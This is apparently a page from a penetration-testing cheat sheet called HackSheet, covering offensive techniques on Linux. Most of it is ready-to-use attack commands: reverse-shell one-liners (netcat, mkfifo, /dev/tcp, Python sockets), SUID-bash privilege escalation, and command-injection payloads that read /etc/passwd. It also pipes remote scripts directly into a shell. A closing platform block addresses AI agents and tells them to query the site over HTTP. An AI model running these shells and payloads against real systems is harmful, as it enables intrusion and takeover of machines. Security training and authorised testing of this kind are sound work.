> For the complete documentation index, see [llms.txt](https://sawyer-flink.gitbook.io/hacksheet/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sawyer-flink.gitbook.io/hacksheet/wiki/linux.md). # Linux ![](https://user-images.githubusercontent.com/28403617/172728126-5dc238f3-9491-415b-a5f6-bedbb62d01cd.svg#gh-light-mode-only) *** * [Command Injection](#command-injection) * [Enumeration](#enumeration) * [FTP](#ftp) * [Gdbserver](#gdbserver) * [Network](#network) * [Port Forwarding](#port-forwarding) * [Privilege Escalation](#privilege-escalation) * [Reverse Shell](#reverse-shell) * [SCP](#scp) * [Sudo](#sudo) ## Sudo ```bash sudo -l ``` ## Enumeration ### Script #### LinPeas ```bash curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh ``` #### Linux Smart Enumeration ```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh chmod +x lse.sh ./lse.sh -l1 ``` #### Metasploit ```bash msfconsole -q -x 'use exploit; set RHOSTS ip; set RPORT port; run; exit' ``` #### Docker ```bash curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -O ``` ### File #### Classic * `/etc/passwd` & `/etc/shadow` * `/www/html` ꞏ `/var/www` ꞏ `/srv/html` ꞏ `/usr/share/*` * `/home/user/.ssh` * `/etc/cron.d` * `/opt/` * `/usr/local/bin` * `/etc/nginx/sites-available/default` * `/etc/apache2/sites-enabled/000-default.conf` #### Proc `/proc/` contains useful information about the processes that are currently running | directory | description | | ------------------- | ----------------------------------------------- | | `/proc/PID/cmdline` | Command line arguments. | | `/proc/PID/cwd` | Link to the current working directory. | | `/proc/PID/environ` | Values of environment variables. | | `/proc/PID/exe` | Link to the executable of this process. | | `/proc/PID/fd` | Directory, which contains all file descriptors. | #### Command ```bash find / -user user 2>&- find / -group group 2>&- find / -user root -executable -type f 2>&- | grep -v /bin/ ``` ```bash /sbin/getcap -r * ``` ## Reverse Shell #### Server ```bash nc -lp 4444 ``` #### reSH ```bash # Client resh ip 4444 # Server resh 4444 ``` [Source](https://github.com/sawyerf/HackSheet/blob/main/scripts/resh.py) #### Netcat ```bash nc ip 4444 -e /bin/bash ``` #### Mkfifo ```bash mkfifo /tmp/f;nc ip 4444 0&1|tee /tmp/f ``` #### Dev ```bash bash -c 'bash -i >& /dev/tcp/ip/4444 0>&1'" ``` #### Python ```bash python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` #### TTY Support ```bash bash -i ``` ```bash python3 -c 'import pty; pty.spawn("/bin/bash")' ``` ```bash script -qc /bin/bash /dev/null ``` #### rlwrap > rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. For when you cannot spawn a proper TTY [*source*](https://github.com/hanslub42/rlwrap) ```bash rlwrap command ``` ```bash # Receiving connection from a reverse shell rlwrap nc -lnvp port # Connecting to the victim rlwrap nc ip port # Add actual bash history and to put all words seen on in- and output on the completion list. rlwrap nc -r -f . nc ip port ``` [*source*](https://github.com/acole76/pentestmonkey-cheatsheets/blob/master/shells.md) ## Privilege Escalation ```bash /bin/cp /bin/bash /tmp/bash_up; /bin/chown user:group /tmp/bash_up; chmod g+s /tmp/bash_up; chmod u+s /tmp/bash_up /tmp/bash_up -p ``` ```bash chmod 4755 /bin/bash bash -p ``` ## FTP > *Port: 21* > > File transfer protocol (FTP) is an Internet tool provided by TCP/IP. It helps to transfer files from one computer to another by providing access to directories or folders on remote computers #### Scan ```bash nmap --script ftp-* -p 21 ip ``` #### Download all files ```bash wget -m --user=user --password=fpassword ftp://ip ``` ```bash wget -m --user=anonymous --password=anonymous ftp://ip ``` ## Gdbserver > *Port: 1337* > > Gdbserver is a computer program that makes it possible to remotely debug other programs. You need to have a copy of the program you want to debug put onto the target system. ``` $ gdb (gdb) target extended-remote ip:port (gdb) remote get remote_file local_file (gdb) remote put local_file remote_file ``` ## Command Injection ```bash ;{cat,/etc/passwd} ;cat${IFS}/etc/passwd; ; cat /etc/passwd ; $(cat /etc/passwd) `cat /etc/passwd` && cat /etc/passwd && || cat /etc/passwd || < <(cat /etc/passwd) | cat /etc/passwd "; cat /etc/passwd " ``` [GTFOBins - Bypass local security restrictions](https://gtfobins.github.io/) ## Network #### Netstat ```bash netstat -tulpn ``` #### Scan Port ```bash for port in {1..65535}; do echo > /dev/tcp/ip/$port && echo "$port open"; done 2>/dev/null ``` #### Scan Ip ```bash for i in {1..254}; do (ping -c 1 192.168.1.${i} | grep "bytes from" | grep -v "Unreachable" &); done; ``` ## Port Forwarding #### Chisel ```bash # Install chisel curl https://i.jpillora.com/chisel! | bash ``` ```bash # Example: 8000 -> 4444 # Attacker machine: chisel server -p 4444 --reverse # Victim machine: chisel client ip-server:4444 R:8000:127.0.0.1:8000 ``` #### SSH ```sh ssh -L 8080:127.0.0.1:8080 user@ip ``` ## SCP #### Download File ``` scp -P port user@192.168.1.ip:path . ``` #### Upload File ``` scp -P port file user@192.168.1.ip:path ``` #### Upload peda ``` scp -P 22 -r ~/.peda user@192.168.1.ip:/tmp/peda ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://sawyer-flink.gitbook.io/hacksheet/wiki/linux.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.